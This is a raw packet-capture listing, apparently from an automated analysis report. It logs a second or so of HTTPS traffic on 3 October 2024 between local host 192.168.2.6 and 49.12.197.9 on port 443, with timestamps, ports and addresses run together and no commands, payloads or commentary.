                                                                                                                                                                  Oct 3, 2024 03:36:02.947676897 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.947706938 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.947726011 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.969208956 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.969259024 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.969320059 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.969336033 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.969358921 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.969371080 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974031925 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974056959 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974160910 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974173069 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974788904 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974833012 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974870920 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974878073 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974905968 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974922895 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.976460934 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.976476908 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.976540089 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.976547003 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977020025 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977041006 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977078915 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.977085114 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977116108 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.977138996 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.982814074 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.982830048 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.982873917 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.982888937 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.982899904 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.982923985 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.004678965 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.004703045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.004749060 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.004766941 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.004791021 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.004807949 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.038678885 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.038697958 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.038748026 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.038773060 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.038785934 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.038873911 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.060126066 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.060143948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.060204029 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.060230970 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.060269117 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.063805103 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.063821077 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.063885927 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.063905001 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.065596104 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.065871954 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.065886021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.065937042 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.065948009 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.066349983 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.067902088 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.067917109 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.067972898 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.067990065 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.068003893 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.068068027 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.070508957 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.070545912 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.070595980 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.070612907 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.070664883 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.091211081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.091227055 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.091305017 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.091325045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.092634916 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.095278978 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.095314026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.095345974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.095360041 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.095437050 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.098561049 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.130390882 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.130414963 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.130534887 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.130563974 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.130609989 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.153327942 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.153350115 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.153469086 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.153476954 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.153516054 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.158941031 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.158958912 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.159054041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.159060955 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.159096956 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.160682917 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.160698891 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.160752058 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.160758972 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.160795927 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164129019 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164145947 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164202929 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164210081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164248943 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164906025 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164922953 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164975882 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164982080 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.165023088 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.189409018 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.189430952 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.189524889 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.189532995 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.189585924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.195194006 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.195209980 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.195265055 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.195272923 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.195311069 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.222928047 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.222949982 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.223052025 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.223084927 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.223129034 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.243952036 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.243973017 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.244157076 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.244167089 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.244280100 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.249315023 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.249370098 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.249403000 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.249408960 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.249437094 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.249453068 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.251507998 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.251554966 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.251626015 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.251631021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.251719952 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.254611969 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.254663944 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.254693031 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.254703999 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.254723072 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.254739046 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.256387949 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.256441116 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.256462097 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.256473064 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.256515026 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.280159950 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.280204058 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.280227900 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.280246019 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.280266047 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.280286074 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.288821936 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.288844109 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.288888931 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.288901091 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.288933039 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.288949966 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.313401937 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.313445091 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.313472986 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.313493013 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.313517094 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.313534975 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.335679054 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.335699081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.335757971 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.335777044 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.335809946 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.335829020 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.341311932 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.341331959 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.341384888 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.341397047 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.341438055 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.342629910 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.342650890 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.342685938 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.342694998 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.342722893 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.342737913 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.345472097 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.345535994 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.345572948 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.345582008 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.345607996 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.345624924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.346501112 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.346519947 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.346560955 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.346570015 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.346595049 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.346610069 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.372832060 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.372854948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.372915030 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.372940063 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.372981071 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.382189035 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.382215023 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.382257938 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.382272005 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.382299900 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.382318974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.405026913 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.405052900 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.405109882 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.405137062 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.405178070 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.427129030 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.427150011 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.427187920 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.427208900 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.427234888 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.427249908 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.432374954 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.432393074 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.432460070 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.432472944 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.432518959 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.435307026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.435329914 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.435388088 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.435395956 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.435410023 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.435427904 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.436248064 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.436265945 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.436300993 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.436307907 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.436371088 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.436371088 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.437449932 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.437470913 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.437506914 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.437515020 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.437530041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.437555075 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.463922977 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.463943958 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.464162111 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.464169979 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.464210987 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.473292112 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.473330975 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.473398924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.473407030 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.473444939 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.496851921 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.496908903 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.496958017 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.496964931 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.496993065 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.497009993 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.517457008 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.517517090 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.517574072 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.517580032 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.517604113 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.517616987 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.529094934 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.529129982 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.529234886 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.529243946 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.529287100 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.529839993 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.529865026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.529906034 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.529910088 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.529936075 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.529953957 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.530827999 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.530857086 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.530913115 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.530919075 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.530955076 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.531755924 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.531785011 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.531821966 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.531826019 CEST4434972849.12.197.9192.168.2.6
